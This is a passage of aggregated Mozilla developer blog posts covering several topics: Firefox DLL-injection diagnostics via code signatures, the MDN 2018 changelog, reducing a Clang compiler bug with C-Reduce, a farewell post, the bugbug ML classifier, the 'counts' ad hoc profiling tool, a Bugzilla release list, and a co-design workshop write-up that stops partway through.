Aaron Klotz2018 Roundup: Q1

I had a very busy 2018. So busy, in fact, that I have not been able to devote any time to actually discussing what I worked on! I had intended to write these posts during the end of December, but a hardware failure delayed that until the new year. Alas, here we are in 2019, and I am going to do a series of retrospectives on last year’s work, broken up by quarter.

(Links to future posts will go here)

Overview

The general theme of my work in 2018 was dealing with the DLL injection problem: On Windows, third parties love to forcibly load their DLLs into other processes – web browsers in particular, thus making Firefox a primary target.

Many of these libraries tend to alter Firefox processes in ways that hurt the stability and/or performance of our code; many chemspill releases have gone out over the years to deal with these problems. While I could rant for hours over this, the fact is that DLL injection is rampant in the ecosystem of Windows desktop applications and is not going to disappear any time soon. In the meantime, we need to be able to deal with it.

Some astute readers might be ready to send me an email or post a comment about how ignorant I am about the new(-ish) process mitigation policies that are available in newer versions of Windows. While those features are definitely useful, they are not panaceas:

  • We cannot turn on the “Extension Point Disable” policy for users of assistive technologies; screen readers rely heavily on DLL injection using SetWindowsHookEx and SetWinEventHook, both of which are covered by this policy;
  • We could enable the “Microsoft Binary Signature” policy, however that requires us to load our own DLLs first before enabling; once that happens, it is often already too late: other DLLs have already injected themselves by the time we are able to activate this policy. (Note that this could easily be solved if this policy were augmented to also permit loading of any DLL signed by the same organization as that of the process’s executable binary, but Microsoft seems to be unwilling to do this.)
  • The above mitigations are not universally available. They do not help us on Windows 7.

For me, Q1 2018 was all about gathering better data about injected DLLs.

Learning More About DLLs Injected into Firefox

One of our major pain points over the years of dealing with injected DLLs has been that the vendor of the DLL is not always apparent to us. In general, our crash reports and telemetry pings only include the leaf name of the various DLLs on a user’s system. This is intentional on our part: we want to preserve user privacy. On the other hand, this severely limits our ability to determine which party is responsible for a particular DLL.

One avenue for obtaining this information is to look at any digital signature that is embedded in the DLL. By examining the certificate that was used to sign the binary, we can extract the organization of the cert’s owner and include that with our crash reports and telemetry.

In bug 1430857 I wrote a bunch of code that enables us to extract that information from signed binaries using the Windows Authenticode APIs. Originally, in that bug, all of that signature extraction work happened from within the browser itself, while it was running: It would gather the cert information on a background thread while the browser was running, and include those annotations in a subsequent crash dump, should such a thing occur.

After some reflection, I realized that I was not gathering annotations in the right place. As an example, what if an injected DLL were to trigger a crash before the background thread had a chance to grab that DLL’s cert information?

I realized that the best place to gather this information was in a post-processing step after the crash dump had been generated, and in fact we already had the right mechanism for doing so: the minidump-analyzer program was already doing post-processing on Firefox crash dumps before sending them back to Mozilla. I moved the signature extraction and crash annotation code out of Gecko and into the analyzer in bug 1436845.

(As an aside, while working on the minidump-analyzer, I found some problems with how it handled command line arguments: it was assuming that main passes its argv as UTF-8, which is not true on Windows. I fixed those issues in bug 1437156.)

In bug 1434489 I also ended up adding this information to the “modules ping” that we have in telemetry; IIRC this ping is only sent weekly. When the modules ping is requested, we gather the module cert info asynchronously on a background thread.

Finally, I had to modify Socorro (the back-end for crash-stats) to be able to understand the signature annotations and be able to display them via bug 1434495. This required two commits: one to modify the Socorro stackwalker to merge the module signature information into the full crash report, and another to add a “Signed By” column to every report’s “Modules” tab to display the signature information (Note that this column is only present when at least one module in a particular crash report contains signature information).

The end result was very satisfying: Most of the injected DLLs in our Windows crash reports are signed, so it is now much easier to identify their vendors!

This project was very satisifying for me in many ways: First of all, surfacing this information was an itch that I had been wanting to scratch for quite some time. Secondly, this really was a “full stack” project, touching everything from extracting signature info from binaries using C++, all the way up to writing some back-end code in Python and a little touch of front-end stuff to surface the data in the web app.

Note that, while this project focused on Windows because of the severity of the library injection problem on that platform, it would be easy enough to reuse most of this code for macOS builds as well; the only major work for the latter case would be for extracting signature information from a dylib. This is not currently a priority for us, though.

Thanks for reading! Coming up in Q2: Refactoring the Windows DLL Interceptor!

Hacks.Mozilla.OrgMDN Changelog – Looking back at 2018

December is when Mozilla meets as a company for our biannual All-Hands, and we reflect on the past year and plan for the future. Here are some of the highlights of 2018.

The browser-compat-data (BCD) project required a sustained effort to convert MDN’s documentation to structured data. The conversion was 39% complete at the start of 2018, and ended the year at 98% complete. Florian Scholz coordinated a large community of staff and volunteers, breaking up the work into human-sized chunks that could be done in parallel. The community converted, verified, and refreshed the data, and converted thousands of MDN pages to use the new data sources. Volunteers also built tools and integrations on top of the data.

The interactive-examples project had a great year as well. Will Bamberg coordinated the work, including some all-staff efforts to write new examples. Schalk Neethling improved the platform as it grew to handle CSS, JavaScript, and HTML examples.

In 2018, MDN developers moved from MozMEAO to Developer Outreach, joining the content staff in Emerging Technologies. The organizational change in March was followed by a nine-month effort to move the servers to the new ET account. Ryan Johnson, Ed Lim, and Dave Parfitt completed the smoothest server transition in MDN’s history.

The strength of MDN is our documentation of fundamental web technologies. Under the leadership of Chris Mills, this content was maintained, improved, and expanded in 2018. It’s a lot of work to keep an institution running and growing, and there are few opportunities to properly celebrate that work. Thanks to Daniel Beck, Eric Shepherd, Estelle Weyl, Irene Smith, Janet Swisher, Rachel Andrew, and our community of partners and volunteers for keeping MDN awesome in 2018.

Kadir Topal led the rapid development of the payments project. We’re grateful to all the MDN readers who are supporting the maintenance and growth of MDN.

There’s a lot more that happened in 2018:

  • January – Added a language preference dialog, and added rate limiting.
  • February – Prepared to move developers to Emerging Technologies.
  • March – Ran a Hack on MDN event for BCD, and tried Brotli.
  • April – Moved MDN to a CDN, and started switching to SVG.
  • May – Moved to ZenHub.
  • June – Shipped Django 1.11.
  • July – Decommissioned zones, and tried new CDN experiments.
  • August – Started performance improvements, added section links, removed memcache from Kuma, and upgraded to ElasticSearch 5.
  • September – Ran a Hack on MDN event for accessibility, and deleted 15% of macros.
  • October – Completed the server migration, and shipped some performance improvements.
  • November – Completed the migration to SVG, and updated the compatibility table header rows.

Shipped tweaks and fixes

There were 124 PRs merged in December, including 27 pull requests from 26 new contributors:

This includes some important changes and fixes:

27 pull requests were from first-time contributors:

Planned for January

David Flanagan took a look at KumaScript, MDN’s macro rendering engine, and is proposing several changes to modernize it, including using await and Jest. These changes are performing well in the development environment, and we plan to get the new code in production in January.

The post MDN Changelog – Looking back at 2018 appeared first on Mozilla Hacks - the Web developer blog.

Nick DesaulniersFinding compiler bugs with C-Reduce

Support for a long awaited GNU C extension, asm goto, is in the midst of landing in Clang and LLVM. We want to make sure that we release a high quality implementation, so it’s important to test the new patches on real code and not just small test cases. When we hit compiler bugs in large source files, it can be tricky to find exactly what part of potentially large translation units are problematic. In this post, we’ll take a look at using C-Reduce, a multithreaded code bisection utility for C/C++, to help narrow done a reproducer for a real compiler bug (potentially; in a patch that was posted, and will be fixed before it can ship in production) from a real code base (the Linux kernel). It’s mostly a post to myself in the future, so that I can remind myself how to run C-reduce on the Linux kernel again, since this is now the third real compiler bug it’s helped me track down.

So the bug I’m focusing on when trying to compile the Linux kernel with Clang is a linkage error, all the way at the end of the build.

1
drivers/spi/spidev.o:(__jump_table+0x74): undefined reference to `.Ltmp4'

Hmm…looks like the object file (drivers/spi/spidev.o), has a section (__jump_table), that references a non-existent symbol (.Ltmp), which looks like a temporary label that should have been cleaned up by the compiler. Maybe it was accidentally left behind by an optimization pass?

To run C-reduce, we need a shell script that returns 0 when it should keep reducing, and an input file. For an input file, it’s just way simpler to preprocess it; this helps cut down on the compiler flags that typically requires paths (-I, -L).

Preprocess

First, let’s preprocess the source. For the kernel, if the file compiles correctly, the kernel’s KBuild build process will create a file named in the form path/to/.file.o.cmd, in our case drivers/spi/.spidev.o.cmd. (If the file doesn’t compile, then I’ve had success hooking make path/to/file.o with bear then getting the compile_commands.json for the file.) I find it easiest to copy this file to a new shell script, then strip out everything but the first line. I then replace the -c -o <output>.o with -E. chmod +x that new shell script, then run it (outputting to stdout) to eyeball that it looks preprocessed, then redirect the output to a .i file. Now that we have our preprocessed input, let’s create the C-reduce shell script.

Reproducer

I find it helpful to have a shell script in the form:

  1. remove previous object files
  2. rebuild object files
  3. disassemble object files and pipe to grep

For you, it might be some different steps. As the docs show, you just need the shell script to return 0 when it should keep reducing. From our previous shell script that pre-processed the source and dumped a .i file, let’s change it back to stop before linking rather that preprocessing (s/-E/-c/), and change the input to our new .i file. Finally, let’s add the test for what we want. Since I want C-Reduce to keep reducing until the disassmbled object file no longer references anything Ltmp related, I write:

<figcaption></figcaption>
1
$ objdump -Dr -j __jump_table spidev.o | grep Ltmp > /dev/null

Now I can run the reproducer to check that it at least returns 0, which C-Reduce needs to get started:

<figcaption></figcaption>
1
2
3
$ ./spidev_asm_goto.sh
$ echo $?
0

Running C-Reduce

Now that we have a reproducer script and input file, let’s run C-Reduce.

<figcaption></figcaption>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
$ time creduce --n 40 spidev_asm_goto.sh spidev.i
===< 144926 >===
running 40 interestingness tests in parallel
===< pass_includes :: 0 >===
===< pass_unifdef :: 0 >===
===< pass_comments :: 0 >===
===< pass_blank :: 0 >===
(0.7 %, 2393679 bytes)
(5.3 %, 2282207 bytes)
===< pass_clang_binsrch :: replace-function-def-with-decl >===
(12.6 %, 2107372 bytes)
...
===< pass_indent :: final >===
(100.0 %, 156 bytes)
===================== done ====================

pass statistics:
  method pass_clang_binsrch :: remove-unused-function worked 1 times and failed 0 times
...
  method pass_lines :: 0 worked 427 times and failed 998 times
            ******** /android0/kernel-all/spidev.i ********

a() {
  int b;
  c();
  if (c < 2)
    b = d();
  else {
    asm goto("1:.long b - ., %l[l_yes] - . \n\t" : : : : l_yes);
  l_yes:;
  }
  if (b)
    e();
}
creduce --n 40 spidev_asm_goto.sh spidev.i  1892.35s user 1186.10s system 817% cpu 6:16.76 total
$ wc -l spidev.i.orig
56160 spidev.i.orig
$ wc -l spidev.i
12 spidev.i

So it took C-reduce just over 6 minutes to turn >56k lines of mostly irrelevant code into 12 when running 40 threads on my 48 core workstation.

It’s also highly entertaining to watch C-Reduce work its magic. In another terminal, I highly recommend running watch -n1 cat <input_file_to_creduce.i> to see it pared down before your eyes.

Jump to 4:24 to see where things really pick up. asciicast asciicast

Finally, we still want to bisect our compiler flags (the kernel uses a lot). I still do this process manually, and it’s not too bad. Having proper and minimal steps to reproduce compiler bugs is critical.

That’s enough for a great bug report for now. In a future episode, we’ll see how to start pulling apart llvm to see where compilation is going amiss.

Nick CameronLeaving Mozilla and (most of) the Rust project

Today is my last day as an employee of Mozilla. It's been almost exactly seven years - two years working on graphics and layout for Firefox, and five years working on Rust. Mostly remote, with a few stints in the Auckland office. It has been an amazing time: I've learnt an incredible amount, worked on some incredible projects, and got to work with some absolutely incredible people. BUT, it is time for me to learn some new things, and work on some new things with some new people.

Nearly everyone I've had contact with at Mozilla has been kind and smart and fun to work with. I would have liked to give thanks and a shout-out to a long list of people I've learned from or had fun with, but the list would be too long and still incomplete.

I'm going to be mostly stepping back from the Rust project too. I'm pretty sad about that (although I hope it will be worth it) - it's an extremely exciting, impactful project. As a PL researcher turned systems programmer, it really has been a dream project to work on. The Rust team at Mozilla and the Rust community in general are good people, and I'll miss working with you all terribly.

Concretely, I plan to continue to co-lead the Cargo and IDEs and Editors teams. I'll stay involved with the Rustfmt and Rustup working groups for a little while. I'll be leaving the other teams I'm involved with, including the core team (although I'll stick around in a reduced capacity for a few months). I won't be involved with code and review for Rust projects day-to-day. But I'll still be around on Discord and GitHub if needed for mentoring or occasional review; I will probably take much longer to respond.

None of the projects I've worked on are going to be left unmaintained, I'm very confident in the people working on them, on the teams I'm leaving behind, and in the Rust community in general (did I say you were awesome already?).

I'm very excited about my next steps (which I'll leave for another post), but for now I'm feeling pretty emotional about moving on from the Rust project and the Rust team at Mozilla. It's been a big part of my life for five years and I'm going to miss y'all. <3

P.S., it turns out that Steve is also leaving Mozilla - this is just a coincidence and there is no conspiracy or shared motive. We have different reasons for leaving, and neither of us knew the other was leaving until after we'd put in our notice. As far as I know, there is no bad blood between either of us and the Rust team.

Marco Castelluccio“It’s not a bug, it’s a feature.” - Differentiating between bugs and non-bugs using machine learning

Bugzilla is a noisy data source: bugs are used to track anything, from Create a LDAP account for contributor X to Printing page Y doesn’t work. This makes it hard to know which bugs are bugs and which bugs are not bugs but e.g. feature requests, or meta bugs, or refactorings, and so on. To ease reading the next paragraphs, I’ll refer as bugbug to bugs that are actually bugs, as fakebug to bugs that are not actually bugs, and as bug to all Bugzilla bugs (bugbug + fakebug).

Why do we need to tell if a bug is actually a bug? There are several reasons, the main two being:

  • Quality metrics: to analyze the quality of a project, to measure the churn of a given release, it can be useful to know, for example, how many bugbugs are filed in a given release cycle. If we don’t know which bugs are bugbugs and which are feature requests, we can’t precisely measure how many problems are found (= bugbugs filed) in a given component for a given release, we can only know the overall number, confusing bugbugs and feature work;
  • Bug prediction: given the development history of the project, one can try to predict, with some measure of accuracy, which changes are risky and more likely to lead to regressions in the future. In order to do that, of course, you need to know which changes introduced problems in the past. If you can’t identify problems (i.e. bugbugs), then you can’t identify changes that introduced them!

On BMO, we have some optional keywords to identify regressions vs features, but they are not used consistently (and, being optional, they can’t be. We can work on improving the practices, but we can’t reach perfection when there is human involvement). So, we need another way to identify them. A possibility is to use handwritten rules (‘mozregression’ in comment → regression; ‘support’ in title → feature), which can be precise up to a certain accuracy level, but any improvement over that requires hard manual labor. Another option is to use machine learning techniques, leaving the hard work of extracting information from bug features to the machines!

The bugbug project is trying to do just that, at first with a very simple ML architecture.

We have a set of 1913 bugs, manually labelled between the two possible classes (bugbug vs nobug). We augment this manually labelled set with Bugzilla bugs containing the keywords ‘regression’ or ‘feature’, which are basically labelled already. The augmented data set contains 10818 bugs. Unfortunately we can’t use all of them indistinctly, as the dataset is unbalanced towards bugbugs, which would skew the results of the classifier, so we simply perform random under-sampling to reduce the number of bugbug examples. In the end, we have 1928 bugs.

We split the dataset into a training set of 1735 bugs and a test set of 193 bugs (90% - 10%).

We extract features both from bug fields (such as keywords, number of attachments, presence of a crash signature, and so on), bug title and comments.

To extract features from text (title and comments), we use a simple BoW model with 1-grams, using TF-IDF to lower the importance of very common words in the corpus and stop word removal mainly to speed up the training phase (stop word removal should not be needed for accuracy in our case since we are using a gradient boosting model, but it can speed up the training phase and it eases experimenting with other models which would really need it).

We are then training a gradient boosting model (these models usually work quite well for shallow features) on top of the extracted features.

Architecture view <figcaption>Figure 1: A high-level overview of the architecture.</figcaption>

This very simple approach, in a handful of lines of code, achieves ~93% accuracy. There’s a lot of room for improvement in the algorithm (it was, after all, written in a few hours…), so I’m confident we can get even better results.

This is just the first step: in the near future we are going to implement improvements in Bugzilla directly and in linked tooling so that we can stop guessing and have very accurate data.

Since the inception of bugbug, we have also added additional experimental models for other related problems (e.g. detecting if a bug is a good candidate for tracking, or predicting the component of a bug), turning bugbug into a platform for quickly building and experimenting with new machine learning applications on Bugzilla data (and maybe soon VCS data too). We have many other ideas to implement, if you are interested take a look at the open issues on our repo!

Nicholas NethercoteAd Hoc Profiling

I have used a variety of profiling tools over the years, including several I wrote myself.

But there is one profiling tool I have used more than any other. It is capable of providing invaluable, domain-specific profiling data of a kind not obtainable by any general-purpose profiler.

It’s a simple text processor implemented in a few dozen lines of code. I use it in combination with logging print statements in the programs I am profiling. No joke.

Post-processing

The tool is called counts, and it tallies line frequencies within text files, like an improved version of the Unix command chain sort | uniq -c. For example, given the following input.

a 1
b 2
b 2
c 3
c 3
c 3
d 4
d 4
d 4
d 4

counts produces the following output.

10 counts:
(  1)        4 (40.0%, 40.0%): d 4
(  2)        3 (30.0%, 70.0%): c 3
(  3)        2 (20.0%, 90.0%): b 2
(  4)        1 (10.0%,100.0%): a 1

It gives a total line count, and shows all the unique lines, ordered by frequency, with individual and cumulative percentages.

Alternatively, when invoked with the -w flag, it assigns each line a weight, determined by the last integer that appears on the line (or 1 if there is no such integer).  On the same input, counts -w produces the following output.

30 counts:
(  1)       16 (53.3%, 53.3%): d 4
(  2)        9 (30.0%, 83.3%): c 3
(  3)        4 (13.3%, 96.7%): b 2
(  4)        1 ( 3.3%,100.0%): a 1

The total and per-line counts are now weighted; the output incorporates both frequency and a measure of magnitude.

That’s it. That’s all counts does. I originally implemented it in 48 lines of Perl, then later rewrote it as 48 lines of Python, and then later again rewrote it as 71 lines of Rust.

In terms of benefit-to-effort ratio, it is by far the best code I have ever written.

counts in action

As an example, I added print statements to Firefox’s heap allocator so it prints a line for every allocation that shows its category, requested size, and actual size. A short run of Firefox with this instrumentation produced a 77 MB file containing 5.27 million lines. counts produced the following output for this file.

5270459 counts:
( 1) 576937 (10.9%, 10.9%): small 32 (32)
( 2) 546618 (10.4%, 21.3%): small 24 (32)
( 3) 492358 ( 9.3%, 30.7%): small 64 (64)
( 4) 321517 ( 6.1%, 36.8%): small 16 (16)
( 5) 288327 ( 5.5%, 42.2%): small 128 (128)
( 6) 251023 ( 4.8%, 47.0%): small 512 (512)
( 7) 191818 ( 3.6%, 50.6%): small 48 (48)
( 8) 164846 ( 3.1%, 53.8%): small 256 (256)
( 9) 162634 ( 3.1%, 56.8%): small 8 (8)
( 10) 146220 ( 2.8%, 59.6%): small 40 (48)
( 11) 111528 ( 2.1%, 61.7%): small 72 (80)
( 12) 94332 ( 1.8%, 63.5%): small 4 (8)
( 13) 91727 ( 1.7%, 65.3%): small 56 (64)
( 14) 78092 ( 1.5%, 66.7%): small 168 (176)
( 15) 64829 ( 1.2%, 68.0%): small 96 (96)
( 16) 60394 ( 1.1%, 69.1%): small 88 (96)
( 17) 58414 ( 1.1%, 70.2%): small 80 (80)
( 18) 53193 ( 1.0%, 71.2%): large 4096 (4096)
( 19) 51623 ( 1.0%, 72.2%): small 1024 (1024)
( 20) 45979 ( 0.9%, 73.1%): small 2048 (2048)

Unsurprisingly, small allocations dominate. But what happens if we weight each entry by its size? counts -w produced the following output.

2554515775 counts:
( 1) 501481472 (19.6%, 19.6%): large 32768 (32768)
( 2) 217878528 ( 8.5%, 28.2%): large 4096 (4096)
( 3) 156762112 ( 6.1%, 34.3%): large 65536 (65536)
( 4) 133554176 ( 5.2%, 39.5%): large 8192 (8192)
( 5) 128523776 ( 5.0%, 44.6%): small 512 (512)
( 6) 96550912 ( 3.8%, 48.3%): large 3072 (4096)
( 7) 94164992 ( 3.7%, 52.0%): small 2048 (2048)
( 8) 52861952 ( 2.1%, 54.1%): small 1024 (1024)
( 9) 44564480 ( 1.7%, 55.8%): large 262144 (262144)
( 10) 42200576 ( 1.7%, 57.5%): small 256 (256)
( 11) 41926656 ( 1.6%, 59.1%): large 16384 (16384)
( 12) 39976960 ( 1.6%, 60.7%): large 131072 (131072)
( 13) 38928384 ( 1.5%, 62.2%): huge 4864000 (4866048)
( 14) 37748736 ( 1.5%, 63.7%): huge 2097152 (2097152)
( 15) 36905856 ( 1.4%, 65.1%): small 128 (128)
( 16) 31510912 ( 1.2%, 66.4%): small 64 (64)
( 17) 24805376 ( 1.0%, 67.3%): huge 3097600 (3100672)
( 18) 23068672 ( 0.9%, 68.2%): huge 1048576 (1048576)
( 19) 22020096 ( 0.9%, 69.1%): large 524288 (524288)
( 20) 18980864 ( 0.7%, 69.9%): large 5432 (8192)

This shows that the cumulative count of allocated bytes (2.55GB) is dominated by a mixture of larger allocation sizes.

This example gives just a taste of what counts can do.

(An aside: in both cases it’s good the see there isn’t much slop, i.e. the difference between the requested sizes and actual sizes are mostly 0. That 5432 entry at the bottom of the second table is curious, though.)

Other Uses

This technique is often useful when you already know something — e.g. a general-purpose profiler showed that a particular function is hot — but you want to know more.

  • Exactly how many times are paths X, Y and Z executed? For example, how often do lookups succeed or fail in data structure D? Print an identifying string each time a path is hit.
  • How many times does loop L iterate? What does the loop count distribution look like? Is it executed frequently with a low loop count, or infrequently with a high loop count, or a mix? Print the iteration count before or after the loop.
  • How many elements are typically in hash table H at this code location? Few? Many? A mixture? Print the element count.
  • What are the contents of vector V at this code location? Print the contents.
  • How many bytes of memory are used by data structure D at this code location? Print the byte size.
  • Which call sites of function F are the hot ones? Print an identifying string at the call site.

Then use counts to aggregate the data. Often this domain-specific data is critical to fully optimize hot code.

Worse is better

Print statements are an admittedly crude way to get this kind of information, profligate with I/O and disk space. In many cases you could do it in a way that uses machine resources much more efficiently, e.g. by creating a small table data structure in the code to track frequencies, and then printing that table at program termination.

But that would require:

  • writing the custom table (collection and printing);
  • deciding where to define the table;
  • possibly exposing the table to multiple modules;
  • deciding where to initialize the table; and
  • deciding where to print the contents of the table.

That is a pain, especially in a large program you don’t fully understand.

Alternatively, sometimes you want information that a general-purpose profiler could give you, but running that profiler on your program is a hassle because the program you want to profile is actually layered under something else, and setting things up properly takes effort.

In contrast, inserting print statements is trivial. Any measurement can be set up in no time at all. (Recompiling is often the slowest part of the process.) This encourages experimentation. You can also kill a running program at any point with no loss of profiling data.

Don’t feel guilty about wasting machine resources; this is temporary code. You might sometimes end up with output files that are gigabytes in size. But counts is fast because it’s so simple… and the Rust version is 3–4x faster than the Python version, which is nice. Let the machine do the work for you. (It does help if you have a machine with an SSD.)

Ad Hoc Profiling

For a long time I have, in my own mind, used the term ad hoc profiling to describe this combination of logging print statements and frequency-based post-processing. Wikipedia defines “ad hoc” as follows.

In English, it generally signifies a solution designed for a specific problem or task, non-generalizable, and not intended to be able to be adapted to other purposes

The process of writing custom code to collect this kind of profiling data — in the manner I disparaged in the previous section — truly matches this definition of “ad hoc”.

But counts is valuable specifically makes this type of custom profiling less ad hoc and more repeatable. I should arguably call it “generalized ad hoc profiling” or “not so ad hoc profiling”… but those names don’t have quite the same ring to them.

Tips

Use unbuffered output for the print statements. In C and C++ code, use fprintf(stderr, ...). In Rust code use eprintln!. (Update: Rust 1.32 added the dbg! macro, which also works well.)

Pipe the stderr output to file, e.g. firefox 2> log.

Sometimes programs print other lines of output to stderr that should be ignored by counts. (Especially if they include integer IDs that counts -w would interpret as weights!) Prepend all logging lines with a short identifier, and then use grep $ID log | counts to ignore the other lines. If you use more than one prefix, you can grep for each prefix individually or all together.

Occasionally output lines get munged together when multiple print statements are present. Because there are typically many lines of output, having a few garbage ones almost never matters.

It’s often useful to use both counts and counts -w on the same log file; each one gives different insights into the data.

To find which call sites of a function are hot, you can instrument the call sites directly. But it’s easy to miss one, and the same print statements need to be repeated multiple times. An alternative is to add an extra string or integer argument to the function, pass in a unique value from each call site, and then print that value within the function.

It’s occasionally useful to look at the raw logs as well as the output of counts, because the sequence of output lines can be informative. For example, I recently diagnosed an occurrences of quadratic behaviour in the Rust compiler by seeing that a loop iterated 1, 2, 3, …, 9000+ times.

The Code

counts is available here.

Conclusion

I use counts to do ad hoc profiling all the time. It’s the first tool I reach for any time I have a question about code execution patterns. I have used it extensively for every bout of major performance work I have done in the past few years, as well as in plenty of other circumstances. I even built direct support for it into rustc-perf, the Rust compiler’s benchmark suite, via the profile eprintln subcommand. Give it a try!

Mozilla B-TeamHappy BMO Push Day!

https://github.com/mozilla-bteam/bmo/tree/release-20190116.4 the following changes have been pushed to bugzilla.mozilla.org:

  • [1518522] phabbugz comments in bugs need to set is_markdown to true
  • [1493253] Embed crash count table to bug pages
  • [1518264] New non-monospace comments styled with way too small a font size
  • [1500441] Make site-wide announcement dismissable
  • [1519240] Markdown comments ruin links wrapped in <>
  • [1519157] Linkification is disabled on <h1>, <h2> etc.
  • [1518328] The edit comment feature should have a preview mode as well
  • [1510996] Abandoned phabricator revisions should be hidden by default
  • [1518967] Edit attachment as comment does markdown, which is very unexpected
  • [1519659] Need to reload the page before being able to edit
  • [1520221] Avoid wrapping markdown comments
  • [1520495] Crash count table does not detect uplift links in Markdown comments
  • [1519564] Add a mechanism for disabling all special markdown syntax
discuss these changes on mozilla.tools.bmo.

Firefox UXReflections on a co-design workshop

Authors: Jennifer Davidson, Meridel Walkington, Emanuela Damiani, Philip Walmsley

Co-design workshops help designers learn first-hand the language of the people who use their products, in addition to their pain points, workflows, and motivations. With co-design methods [1] participants are no longer passive recipients of products. Rather, they are involved in the envisioning and re-imagination of them. Participants show us what they need and want through sketching and design exercises. The purpose of a co-design workshop is not to have a pixel-perfect design to implement, rather it’s to learn more about the people who use or will use the product, and to involve them in generating ideas about what to design.

We ran a co-design workshop at Mozilla to inform our product design, and we’d like to share our experience with you.

<figcaption>Sketching exercises during the co-design workshop were fueled by coffee and tea.</figcaption>

Before the workshop

Our UX team was tasked with improving the Firefox browser extension experience. When people create browser extensions, they use a form to submit their creations. They submit their code and all the metadata about the extension (name, description, icon, etc.). The metadata provided in the submission form is used to populate the extension’s product page on addons.mozilla.org.

<figcaption>A cropped screenshot of the third step of the submission form, which asks for metadata like name and description of the extension.</figcaption>
<figcaption>Screenshot of an extension product page on addons.mozilla.org.</figcaption>

The Mozilla Add-ons team (i.e., Mozilla staff who work on improving the extensions and themes experience) wanted to make sure that the process to submit an extension is clear and useful, yielding a quality product page that people can easily find and understand. Improving the submission flow for developers would lead to higher quality extensions for people to use.

We identified some problems by using test extensions to “eat our own dog food” (i.e. walk through the current process). Our content strategist audited the submission flow experience to understand product page guidelines in the submission flow. Then some team members conducted a cognitive walkthrough [2] to gain knowledge of the process and identify potential issues.

After identifying some problems, we sought to improve our submission flow for browser extensions. We decided to run a co-design workshop that would identify more problem areas and generate new ideas. The workshop took place in London on October 26, one day before MozFest, an annual week-long “celebration for, by, and about people who love the internet.” Extension and theme creators were selected from our global add-ons community to participate in the workshop. Mozilla staff members were involved, too: program managers, a community manager, an Engineering manager, and UX team members (designers, a content strategist, and a user researcher).

<figcaption>A helpful and enthusiastic sticky note on the door of our workshop room. Image: “Submission flow workshop in here!!” posted on a sticky note on a wooden door.</figcaption>

Steps we took to create and organize the co-design workshop

After the audit and cognitive walkthrough, we thought a co-design workshop might help us get to a better future. So we did the following:

  1. Pitch the idea to management and get buy-in
  2. Secure budget
  3. Invite participants
  4. Interview participants (remotely)
  5. Analyze interviews
  6. Create an agenda for the workshop. Our agenda included: ice breaker, ground rules, discussion of interview results, sketching (using this method [3]) & critique sessions, creating a video pitch for each group’s final design concept.
  7. Create workshop materials
  8. Run the workshop!
  9. Send out a feedback survey
  10. Debrief with Mozilla staff
  11. Analyze results (over three days) with Add-ons UX team
  12. Share results (and ask for feedback) of analysis with Mozilla staff and participants

Lessons learned: What went well

Interview participants beforehand

We interviewed each participant before the workshop. The participants relayed their experience about submitting extensions and their motivations for creating extensions. They told us their stories, their challenges, and their successes.

Conducting these interviews beforehand helped our team in a few ways:

  • The interviews introduced the team and facilitators, helping to build rapport before the workshop.
  • The interviews gave the facilitators context into each participant’s experience. We learned about their motivations for creating extensions and themes as well as their thoughts about the submission process. This foundation of knowledge helped to shape the co-design workshop (including where to focus for pain points), and enabled us to prepare an introductory data summary for sharing at the workshop.
  • We asked for participants’ feedback about the draft content guidelines that our content strategist created to provide developers with support, examples, and writing exercises to optimize their product page content. Those guidelines were to be incorporated into the new submission flow, so it was very helpful to get early user feedback. It also gave the participants some familiarity with this deliverable so they could help incorporate it into the submission flow during the workshop.
<figcaption>A photo of Jennifer, user researcher, presenting interview results back to the participants, near the beginning of the workshop.</figcaption>

Thoughtfully select diverse participants

The Add-ons team has an excellent community manager, Caitlin Neiman, who interfaces with the greater Add-ons community. Working with Mozilla staff, she selected a diverse group of community participants for the workshop. The participants hailed from several different countries, some were paid to create extensions and some were not, and some had attended Mozilla events before and some had not. This careful selection of participants resulted in diverse perspectives, workflows, and motivations that positively impacted the workshop.

Create Ground Rules

Design sessions can benefit from a short introductory activity of establishing ground rules to get everyone on the same page and set the tone for the day. This activity is especially helpful when participants don’t know one another.

Using a flip chart and markers, we asked the room of participants to volunteer ground rules. We captured and reviewed those as a group.

<figcaption>A photo of Emanuela, UX Designer and facilitator, scribing ground rules on a flip chart.</figcaption>

Why are ground rules important?

Designing the rules together, with facilitators and participants, serves as a way to align the group with a set of shared values, detecting possible harmful group behaviors and proposing productive and healthy interactions. Ground rules help make everyone’s experience a more rich and satisfying one.

Assign roles and create diverse working groups during the workshop

The Mozilla UX team in Taipei recently conducted a participatory workshop with older adults. In their blog post, they also highlight the importance of creating diverse working groups for the workshops [4].

In our workshop, each group was comprised of:

  • multiple participants (i.e. extension and theme creators)
  • a Mozilla staff program manager, engineering manager, community manager, and/or engineer.
  • a facilitator who was either a Mozilla staff designer or program manager. As a facilitator, the designer was a neutral party in the group and could internalize participants’ mental models, workflows, and vocabulary through the experience.

We also assigned roles during group critique sessions. Each group member chose to be a dreamer (responds to ideas with a “Why not?” attitude), a realist (responds to ideas with “How?”), or a spoiler (responds to ideas by pointing out their flaws). This format is called the Walt Disney approach [5].

<figcaption>Post-its for each critique role: Realist, Spoiler, Dreamer</figcaption>

Why are critique roles important?

Everyone tends to fit into one of the Walt Disney roles naturally. Being pushed to adopt a role that may not be their tendency gets participants to step out of their comfort zone gently. The roles help participants empathize with other perspectives.

We had other roles throughout the workshop as well, namely, a “floater” who kept everyone on track and kept the workshop running, a timekeeper, and a photographer.

Ask for feedback about the workshop results

The “co” part of “co-design” doesn’t have to end when the workshop concludes. Using what we learned during the workshop, the Add-ons UX team created personas and potential new submission flow blueprints. We sent those deliverables to the workshop participants and asked for their feedback. As UX professionals, it was useful to close the feedback loop and make sure the deliverables accurately reflected the people and workflows being represented.

Lessons Learned: What could be improved

The workshop was too long

We flew from around the world to London to do this workshop. A lot of us were experiencing jet lag. We had breaks, coffee, biscuits, and lunch. Even so, going from 9 to 4, sketching for hours and iterating multiple times was just too much for one day.

<figcaption>Jorge, a product manager, provided feedback about the workshop’s duration. Image: “Jorge is done” text written above a skull and crossbones sketch.</figcaption>

We have ideas about how to fix this. One approach is to introduce a variety of tasks. In the workshop we mostly did sketching over and over again. Another idea is to extend the workshop across two days, and do a few hours each day. Another idea is to shorten the workshop and do fewer iterations.

There were not enough Mozilla staff engineers present

